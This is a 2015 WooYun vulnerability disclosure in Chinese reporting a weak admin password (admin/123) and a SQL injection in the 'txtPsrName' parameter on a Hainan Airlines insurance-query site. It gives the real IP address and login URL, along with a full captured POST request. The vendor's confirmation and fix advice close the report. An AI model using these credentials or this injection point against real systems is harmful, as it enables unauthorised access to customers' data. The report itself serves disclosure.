乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-15: 细节已通知厂商并且等待厂商处理中 2015-02-15: 厂商已经确认,细节仅向厂商公开 2015-02-25: 细节向核心白帽子及相关领域专家公开 2015-03-07: 细节向普通白帽子公开 2015-03-17: 细节向实习白帽子公开 2015-04-01: 细节向公众公开
海南航空某站点弱口令+sql注入
url:http://1.202.236.211/FrameWork/Login.aspx用户名:admin密码:123
SQL注入:
POST /FlightReserve/Insurance/InsuranceList.aspx HTTP/1.1Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Referer: http://1.202.236.211/FlightReserve/Insurance/InsuranceList.aspxAccept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E; BOIE9;ZHCN)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: 1.202.236.211Content-Length: 1166Proxy-Connection: Keep-AlivePragma: no-cacheCookie: ASP.NET_SessionId=tj04v4npp5413bz1clrkio45; CheckCode=5034; Manage=3C008DD1C4434A011A5288CD90CE97E28CD3584BCB091B6E36E57DD1783DF38E5EEAE2388B85CB11262524817F304D94D9EE6D47D98F001193A65368C4A558509D6144DF1CE7C51758321E898866B8286CE6DD5DC52F81EA8308333152F03645820D6C73EF0C3F10EA0576568784357701CE4626__VIEWSTATE=%2FwEPDwUKMTY5ODAzMzM5Mw9kFgICAw9kFgoCBw8PZBYKHgdvbmNsaWNrBQxzZXRkYXkodGhpcykeBm9uYmx1cgUMc2V0ZGF5KHRoaXMpHgpvbmtleXByZXNzBRhqYXZhc2NyaXB0OnJldHVybiBmYWxzZTseCW9ua2V5ZG93bgUYamF2YXNjcmlwdDpyZXR1cm4gZmFsc2U7HgdvbmtleXVwBRhqYXZhc2NyaXB0OnJldHVybiBmYWxzZTtkAgkPD2QWCh8ABQxzZXRkYXkodGhpcykfAQUMc2V0ZGF5KHRoaXMpHwIFGGphdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOx8DBRhqYXZhc2NyaXB0OnJldHVybiBmYWxzZTsfBAUYamF2YXNjcmlwdDpyZXR1cm4gZmFsc2U7ZAIPDw9kFgYfAgUdamF2YXNjcmlwdDpyZXR1cm4gQ2xlYXJUeHQoKTsfAwUdamF2YXNjcmlwdDpyZXR1cm4gQ2xlYXJUeHQoKTsfBAUdamF2YXNjcmlwdDpyZXR1cm4gQ2xlYXJUeHQoKTtkAhkPZBYCAgEPFgIeC18hSXRlbUNvdW50ZmQCGw9kFgJmDw8WAh4LUmVjb3JkY291bnRmZGRkXaG5ZoTrjQLd93lJUVgJyXfXyiI%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWFAKl%2Bbj%2FDQLogvuaCQL74r3wCQLkwtn1DwLxwtn1DwL2wtn1DwLqwtn1DwK27t2jDgKp7t2jDgKo7t2jDgLI8tiJCQKMmNvZAwKln%2FPuCgLx9YKkDwLElP2TDgKDm9jiDQKklZejAgLFqfiRCwLJ1Lb1CwLWy%2FTBDj%2Bi0xjDptQSTz998NRihXD4SLLC&txtPsrName=1&dropOperateType=All&drpTimeType=0&txtInsuranceDtBegin=2015-02-15&txtInsuranceDtEnd=2015-02-15&btnSearch=%B2%E9%D1%AF&txtCustomerNo=&txtCustomer=&txtOrderNo=&txtIdentityNo=&Pager%24pagerCurrentPage=1&Pager%24pagerFilter=
其中txtPsrName 参数存在sql 注入
修改密码 后台功能将查询参数过滤严格
危害等级:中
漏洞Rank:10
确认时间:2015-02-15 10:57
谢谢depycode,这个问题我们将联系开发和后台进行处理。
暂无